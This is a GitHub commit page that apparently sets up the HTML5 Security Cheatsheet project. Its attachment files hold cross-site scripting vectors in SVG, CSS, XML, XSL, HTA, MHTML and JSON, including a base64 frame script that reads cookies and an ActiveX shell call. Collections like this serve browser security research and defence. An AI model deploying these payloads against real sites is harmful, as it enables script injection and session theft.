Permalink
Browse files

#Initial commit

  • Loading branch information...
mario
mario committed Mar 28, 2014
1 parent 927d72d commit ee0ffec368c33faec15627c09185567c88a252d7
Showing with 5,852 additions and 0 deletions.
  1. +2 −0 .gitignore
  2. +11 −0 .project
  3. BIN attachments/Test.class
  4. +4 −0 attachments/event.php
  5. +1 −0 attachments/font.svg
  6. BIN attachments/test.asf
  7. BIN attachments/test.avi
  8. +6 −0 attachments/test.css
  9. +1 −0 attachments/test.dtd
  10. +18 −0 attachments/test.eml
  11. +1 −0 attachments/test.evt
  12. BIN attachments/test.gif
  13. BIN attachments/test.hlp
  14. +3 −0 attachments/test.hta
  15. +1 −0 attachments/test.htc
  16. +1 −0 attachments/test.html
  17. BIN attachments/test.jar
  18. +1 −0 attachments/test.js
  19. +1 −0 attachments/test.json
  20. BIN attachments/test.mpeg
  21. BIN attachments/test.pdf
  22. +7 −0 attachments/test.php
  23. +4 −0 attachments/test.sct
  24. +3 −0 attachments/test.svg
  25. BIN attachments/test.swf
  26. +1 −0 attachments/test.vbs
  27. +1 −0 attachments/test.vml
  28. BIN attachments/test.wbxml
  29. +1 −0 attachments/test.xbl
  30. +1 −0 attachments/test.xdr
  31. +6 −0 attachments/test.xml
  32. +6 −0 attachments/test.xsl
  33. +1 −0 attachments/test.xxe
  34. BIN attachments/test.zip
  35. +4 −0 attachments/test2.css
  36. +3 −0 attachments/test2.dtd
  37. +58 −0 attachments/test2.js
  38. +1 −0 attachments/test2.php
  39. +4 −0 attachments/test2.svg
  40. +27 −0 attachments/test3.svg
  41. +10 −0 attachments/test4.svg
  42. +5 −0 attachments/test5.svg
  43. +4 −0 attachments/try.html
  44. +121 −0 categories.json
  45. BIN html/images/chrome.png
  46. BIN html/images/cn.png
  47. BIN html/images/cs.png
  48. BIN html/images/en.png
  49. BIN html/images/firefox.png
  50. BIN html/images/ie.png
  51. BIN html/images/ja.png
  52. BIN html/images/opera.png
  53. BIN html/images/ru.png
  54. BIN html/images/safari.png
  55. BIN html/images/search.png
  56. BIN html/images/tr.png
  57. +47 −0 html/index.html
  58. +229 −0 html/scripts/import.js
  59. +154 −0 html/scripts/jquery.js
  60. +207 −0 html/styles/basic.css
  61. +4,860 −0 items.json
  62. +36 −0 payload.json
View
@@ -0,0 +1,2 @@
+.project
+node_modules
View
@@ -0,0 +1,11 @@
+<?xml version="1.0" encoding="UTF-8"?>
+<projectDescription>
+ <name>H5SC</name>
+ <comment></comment>
+ <projects>
+ </projects>
+ <buildSpec>
+ </buildSpec>
+ <natures>
+ </natures>
+</projectDescription>
View
Binary file not shown.
View
@@ -0,0 +1,4 @@
+<?php
+header("Content-Type: application/x-dom-event-stream");
+die("Event: load\ndata: \n\n");
+?>
View
@@ -0,0 +1 @@
+<?xml version="1.0" standalone="no"?><!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd"><svg onload="alert(1)" xmlns="http://www.w3.org/2000/svg"><defs><font id="x"><font-face font-family="y"/></font></defs></svg>
View
Binary file not shown.
View
Binary file not shown.
View
@@ -0,0 +1,6 @@
+* {
+ color: red;
+ -o-link: 'javascript:alert(1)';
+ -o-link-source: current;
+ x: expression(write(1));
+}
View
@@ -0,0 +1 @@
+<!ENTITY x "&#x3C;html:img&#x20;src='x'&#x20;xmlns:html='http://www.w3.org/1999/xhtml'&#x20;onerror='alert(1)'/&#x3E;">
View
@@ -0,0 +1,18 @@
+ABCDEFGHIJK
+GARBAGE HERE
+ABCDEFGHIJK
+JUST NO TWO NEWLINES
+Content-Type: text/html
+Content-Transfer-Encoding: quoted-printable
+
+=3cs=
+cr=
+ipt=3e
+=61le=
+rt=28docu=
+ment=2e=
+dom=61=
+in=29
+=3c=2f=
+script=3e
+
View
@@ -0,0 +1 @@
+<script xmlns="http://www.w3.org/1999/xhtml" id="x">alert(1)</script>
View
Binary file not shown.
View
Binary file not shown.
View
@@ -0,0 +1,3 @@
+<textarea id="x" style="width:95%;height:200px;">new ActiveXObject('WScript.Shell').Run('calc.exe')</textarea>
+<hr>
+<button onclick="eval(x.value)">eval()</button>
View
@@ -0,0 +1 @@
+<?xml version="1.0"?><x><payload><![CDATA[<img src=x onerror=alert(1)>]]></payload></x>
View
@@ -0,0 +1 @@
+<html> <body> <b>some content without two new line \n\n</b> Content-Type: multipart/related; boundary="******"<b>some content without two new line</b> --****** Content-Location: xss.html Content-Transfer-Encoding: base64 PGlmcmFtZSBuYW1lPWxvIHN0eWxlPWRpc3BsYXk6bm9uZT48L2lmcmFtZT4NCjxzY3JpcHQ+DQp1 cmw9bG9jYXRpb24uaHJlZjtkb2N1bWVudC5nZXRFbGVtZW50c0J5TmFtZSgnbG8nKVswXS5zcmM9 dXJsLnN1YnN0cmluZyg2LHVybC5pbmRleE9mKCcvJywxNSkpO3NldFRpbWVvdXQoImFsZXJ0KGZy YW1lc1snbG8nXS5kb2N1bWVudC5jb29raWUpIiwyMDAwKTsNCjwvc2NyaXB0PiAgICAg -- </body> </html>
View
Binary file not shown.
View
@@ -0,0 +1 @@
+alert(1)
View
@@ -0,0 +1 @@
+{"xss":alert(1), "url": "javascript:alert(1)"}
View
Binary file not shown.
View
Binary file not shown.
View
@@ -0,0 +1,7 @@
+* {
+ color: red;
+ -o-link: 'javascript:alert(1)';
+ -o-link-source: current;
+ x: expression(write(1));
+}
+
View
@@ -0,0 +1,4 @@
+<SCRIPTLET>
+ <IMPLEMENTS Type="Behavior"></IMPLEMENTS>
+ <SCRIPT Language="javascript">alert(1)</SCRIPT>
+</SCRIPTLET>
View
@@ -0,0 +1,3 @@
+<svg xmlns="http://www.w3.org/2000/svg">
+ <script>alert(1)</script>
+</svg>
View
Binary file not shown.
View
@@ -0,0 +1 @@
+msgbox 1
View
@@ -0,0 +1 @@
+<xml><rect style="height:100%;width:100%" id="xss" onmouseover="alert(1)" strokecolor="white" strokeweight="2000px" filled="false" /></xml>
View
Binary file not shown.
View
@@ -0,0 +1 @@
+<?xml version="1.0" ?><bindings xmlns="http://www.mozilla.org/xbl"><binding id="xss"><implementation><constructor><![CDATA[alert(1)]]></constructor></implementation></binding></bindings>
View
@@ -0,0 +1 @@
+<?xml version="1.0"?><Schema name="x" xmlns="urn:schemas-microsoft-com:xml-data"><ElementType name="img"><AttributeType name="src" required="yes" default="x"/><AttributeType name="onerror" required="yes" default="alert(1)"/><attribute type="src"/><attribute type="onerror"/></ElementType></Schema>
View
@@ -0,0 +1,6 @@
+<html>
+<head></head>
+<body>
+<something:script xmlns:something="http://www.w3.org/1999/xhtml">alert(1)</something:script>
+</body>
+</html>
View
@@ -0,0 +1,6 @@
+<?xml version="1.0" ?>
+<xsl:stylesheet xmlns:xsl="http://www.w3.org/1999/XSL/Transform" version="1.0">
+ <xsl:template match="/">
+ <script>alert(1)</script>
+ </xsl:template>
+</xsl:stylesheet>
View
@@ -0,0 +1 @@
+<script xmlns="http://www.w3.org/1999/xhtml">alert(1)</script>
View
Binary file not shown.
View
@@ -0,0 +1,4 @@
+</style><script>alert(1)</script>
+<iframe src="javascript:alert(2)"></iframe>
+<img src="x" onerror="alert(3)"><style>
+<svg onload="alert(4)">
View
@@ -0,0 +1,3 @@
+<!ELEMENT x (y)>
+<!ELEMENT y (#PCDATA)>
+<!ENTITY js "&lt;img src='x' onerror='alert(1)' /&gt;">
View
@@ -0,0 +1,58 @@
+{
+ "template":"<img src=x onerror=alert(1)>",
+ "version":"6.7.0_b1,525 (2013-06-28 1049)",
+ "boundingBox":"367363.9685 5696285.255 386225.9215 5710960.905",
+ "layers":[
+ {
+ "type":"base-layer",
+ "id":"\"onmouseover=alert(1)//",
+ "name":"<img src=x onerror=alert(1)>",
+ "geometry":"polygon",
+ "url":"_statistische_bezirke_region.shp1.js",
+ "visible":true,
+ "symbolSize":15,
+ "fillColor":"#ffffff",
+ "fillOpacity":0.8,
+ "borderColor":"#cccccc",
+ "borderThickness":1,
+ "showLabels":false,
+ "minLabelExtent":0,
+ "maxLabelExtent":1000000,
+ "iconPath":"",
+ "showDataTips":true,
+ "showInLayerList":true
+ },
+ {
+ "type":"contextual-layer",
+ "id":"contextualLayer1",
+ "name":"<img src=x onerror=alert(2)>",
+ "geometry":"polygon",
+ "url":"contextualLayer1.js",
+ "visible":true,
+ "symbolSize":10,
+ "fillColor":"#FFA200",
+ "fillOpacity":0,
+ "borderColor":"#990033",
+ "borderThickness":1.5,
+ "showLabels":false,
+ "minLabelExtent":0,
+ "maxLabelExtent":1000000,
+ "iconPath":"",
+ "showDataTips":false,
+ "showInLayerList":true
+ },
+ {
+ "type":"wms-layer",
+ "id":"wms-965015445",
+ "name":"<img src=x onerror=alert(3)>",
+ "geometry":"image",
+ "visible":true,
+ "url":"http://wms.bochum.de/Instant_Atlas/MapServer/WMSServer?",
+ "layers":"0",
+ "srs":"EPSG:25832",
+ "params":"",
+ "version":"1.3.0",
+ "showInLayerList":true
+ }
+ ]
+}
View
@@ -0,0 +1 @@
+<html> <body> <b>some content without two new line \n\n</b> Content-Type: multipart/related; boundary="******"<b>some content without two new line</b> --****** Content-Location: xss.swf Content-Transfer-Encoding: base64 <?php echo base64_encode(file_get_contents('test.swf')) ?> -- </body> </html>
View
@@ -0,0 +1,4 @@
+<?xml version="1.0"?>
+<form xmlns="http://www.w3.org/1999/xhtml" target="_top" action="javascript:alert(1)">
+<input value="XXX" type="submit"/>
+</form>
View
@@ -0,0 +1,27 @@
+<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink">
+
+<clipPath id="a" >
+<set xlink:href="#x" attributeName="xlink:href" begin="1s" to="javascript:alert(1)" />
+</clipPath>
+
+<pattern id="b">
+<set xlink:href="#x" attributeName="xlink:href" begin="2s" to="javascript:alert(2)" />
+</pattern>
+
+<filter id="c">
+<set xlink:href="#x" attributeName="xlink:href" begin="3s" to="javascript:alert(3)" />
+</filter>
+
+<marker id="d">
+<set xlink:href="#x" attributeName="xlink:href" begin="4s" to="javascript:alert(4)" />
+</marker>
+
+<mask id="e">
+<set xlink:href="#x" attributeName="xlink:href" begin="5s" to="javascript:alert(5)" />
+</mask>
+
+<linearGradient id="f">
+<set xlink:href="#x" attributeName="xlink:href" begin="6s" to="javascript:alert(6)" />
+</linearGradient>
+
+</svg>
View
@@ -0,0 +1,10 @@
+<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink">
+
+<marker id="a" markerWidth="1000" markerHeight="1000" refX="0" refY="0">
+ <a xlink:href="http://google.com">
+ <set attributeName="xlink:href" to="javascript:alert(1)" begin="1s" />
+ <rect width="1000" height="1000" fill="white"/>
+ </a>
+</marker>
+
+</svg>
View
@@ -0,0 +1,5 @@
+<form xmlns="http://www.w3.org/1999/xhtml" target="_top" action="javascript:alert(1)">
+<!-- this file can be crossdomain if "action" attribute refers to an external file -->
+<meta http-equiv="refresh" content="1;URL=test5.svg"/>
+<input type="submit" autofocus="autofocus"/>
+</form>
View
@@ -0,0 +1,4 @@
+<meta content="text/html; charset=utf-8" http-equiv="Content-Type" />
+1;--<?f><l₩:!!:x\‮/style=`b&#x5c;65h\0061vIo\r/ĸ
+:url(#def&#x61ult#time2)\ö/';'`₩/onbegin=
+&#x5bµ=\u00&#054;1le&#114t&#40&#x31)&#x5d&#x2f/&#xyŧ\>
View
@@ -0,0 +1,121 @@
+/* Categories - the available categories */
+var categories =
+{
+ 'html5' : {
+ 'en' : 'Vectors making use of HTML5 features',
+ 'ja' : 'HTML5\u306e\u6a5f\u80fd\u3092\u4f7f\u3063\u305f\u624b\u6cd5',
+ 'ru' : 'HTML5',
+ 'cs' : 'Útoky využívající možností HTML5',
+ 'de' : '',
+ 'tr' : 'HTML5 özelliklerinden yararlanan vektörler',
+ 'zh' : 'HTML5特性向量'
+ },
+ 'html' : {
+ 'en' : 'Vectors working on HTML4 and older versions',
+ 'ja' : 'HTML4\u4ee5\u524d\u3067\u6a5f\u80fd\u3059\u308b\u624b\u6cd5',
+ 'ru' : 'HTML4↓',
+ 'cs' : 'Útoky fungující v HTML4 a starších',
+ 'de' : '',
+ 'tr' : 'HTML4 ve eski versiyonlarında çalışan vektörler',
+ 'zh' : 'HTML4和一些老的向量'
+ },
+ 'css' : {
+ 'en' : 'Cascading stylesheet injection based vectors',
+ 'ja' : '\u30b9\u30bf\u30a4\u30eb\u30b7\u30fc\u30c8\u306e\u30a4\u30f3\u30b8\u30a7\u30af\u30b7\u30e7\u30f3\u306b\u3088\u308b\u624b\u6cd5',
+ 'ru' : 'CSS',
+ 'cs' : 'Útoky založené na injektáži CSS',
+ 'de' : '',
+ 'tr' : 'CSS enjeksiyonu tabanlı vektörler',
+ 'zh' : '基于CSS注入的向量'
+ },
+ 'javascript' : {
+ 'en' : 'Plain JavaScript vectors',
+ 'ja' : '\u30d7\u30ec\u30fc\u30f3\u306aJavaScript\u306b\u3088\u308b\u624b\u6cd5',
+ 'ru' : 'JavaScript',
+ 'cs' : 'Útoky obyčejným JavaScriptem',
+ 'de' : '',
+ 'tr' : 'Düz JavaScript Vektörleri',
+ 'zh' : '纯javascript的向量'
+ },
+ 'e4x' : {
+ 'en' : 'E4X vectors working on gecko based browsers',
+ 'ja' : 'Gecko\u30d9\u30fc\u30b9\u306e\u30d6\u30e9\u30a6\u30b6\u306b\u5bfe\u3059\u308bE4X\u306b\u3088\u308b\u624b\u6cd5',
+ 'ru' : 'E4X',
+ 'cs' : 'Útoky založené na E4X v prohlížečích s jádrem Gecko',
+ 'de' : '',
+ 'tr' : 'Gecko tabanlı tarayıcılarda çalışan E4X vektörleri',
+ 'zh' : 'E4X向量'
+ },
+ 'dom' : {
+ 'en' : 'Vectors attacking DOM properties and methods',
+ 'ja' : 'DOM\u30d7\u30ed\u30d1\u30c6\u30a3\u3001\u30e1\u30bd\u30c3\u30c9\u3092\u5229\u7528\u3057\u305f\u624b\u6cd5',
+ 'ru' : 'DOM',
+ 'cs' : 'Útoky na vlastnosti a metody DOM',
+ 'de' : '',
+ 'tr' : 'DOM özelliklerine ve metotlarına saldıran vektörler',
+ 'zh' : 'DOM属性与方法的攻击向量'
+ },
+ 'json' : {
+ 'en' : 'JSON based vectors',
+ 'ja' : 'JSON\u30d9\u30fc\u30b9\u306e\u624b\u6cd5',
+ 'ru' : 'JSON',
+ 'cs' : 'Útoky založené na JSON',
+ 'de' : '',
+ 'tr' : 'JSON tabanlı vektörler',
+ 'zh' : '基于JSON的向量'
+ },
+ 'svg' : {
+ 'en' : 'Vectors embedded in SVG files',
+ 'ja' : 'SVG\u30d5\u30a1\u30a4\u30eb\u3078\u306e\u57cb\u3081\u8fbc\u307f\u306b\u3088\u308b\u624b\u6cd5',
+ 'ru' : 'SVG',
+ 'cs' : 'Útoky ukryté v SVG',
+ 'de' : '',
+ 'tr' : 'SVG dosyalarına gömülü vektörler',
+ 'zh' : 'SVG内的向量'
+ },
+ 'xml' : {
+ 'en' : 'Vectors related to X(HT)ML',
+ 'ja' : 'X\u0028HT\u0029ML\u306b\u95a2\u9023\u3059\u308b\u624b\u6cd5',
+ 'ru' : 'X(HT)ML',
+ 'cs' : 'Útoky svázané s X(HT)ML',
+ 'de' : '',
+ 'tr' : 'X(HT)ML ile ilgili vektörler',
+ 'zh' : 'X(HT)ML相关向量'
+ },
+ 'charset' : {
+ 'en' : 'UTF7 and other exotic charset based vectors',
+ 'ja' : 'UTF-7\u306a\u3069\u306e\u7279\u6b8a\u306a\u6587\u5b57\u30a8\u30f3\u30b3\u30fc\u30c7\u30a3\u30f3\u30b0\u306b\u3088\u308b\u624b\u6cd5',
+ 'ru' : 'UTF-7 и др. экзот. код-ки',
+ 'cs' : 'Útoky založené na UTF-7 a dalších exotických znakových sadách',
+ 'de' : '',
+ 'tr' : 'UTF-7 ve diğer egzotik karakter kodlamaları tabanlı vektörler',
+ 'zh' : 'UTF-7和其它诡异的编码集的向量'
+ },
+ 'dos' : {
+ 'en' : 'Client side denial of service vectors',
+ 'ja' : '\u30af\u30e9\u30a4\u30a2\u30f3\u30c8\u30b5\u30a4\u30c9\u3067\u306e\u30b5\u30fc\u30d3\u30b9\u4e0d\u80fd(DoS)',
+ 'ru' : 'DoS',
+ 'cs' : 'Útoky DoS zaměřené na klienta',
+ 'de' : '',
+ 'tr' : 'İstemci taraflı servis durdurdma (DoS) vektörleri',
+ 'zh' : '客户端DOS向量'
+ },
+ 'behavior' : {
+ 'en' : 'HTML behavior and binding vectors',
+ 'ja' : 'HTML behavior \u306b\u3088\u308b\u624b\u6cd5',
+ 'ru' : 'Поведения и связывание данных',
+ 'cs' : 'Útoky využívající HTML behavior a binding',
+ 'de' : '',
+ 'tr' : 'HTML behavior ve binding vektörleri',
+ 'zh' : 'HTML behavior和binding相关向量'
+ },
+ 'clickjacking' : {
+ 'en' : 'Clickjacking and UI Redressing vectors',
+ 'ja' : '',
+ 'ru' : 'Перехват нажатий и подмена интерфейса',
+ 'cs' : '',
+ 'de' : '',
+ 'tr' : 'Clickjacking ve Kullanıcı Arabirimi değiştirme vektörleri',
+ 'zh' : 'Clickjacking和UI Redressing的向量'
+ }
+}
View
Binary file not shown.
View
Binary file not shown.
View
Binary file not shown.
View
Binary file not shown.
View
Binary file not shown.
View
Binary file not shown.
View
Binary file not shown.
View
Binary file not shown.
View
Binary file not shown.
View
Binary file not shown.
View
Binary file not shown.
View
Binary file not shown.
Oops, something went wrong.

0 comments on commit ee0ffec

Please sign in to comment.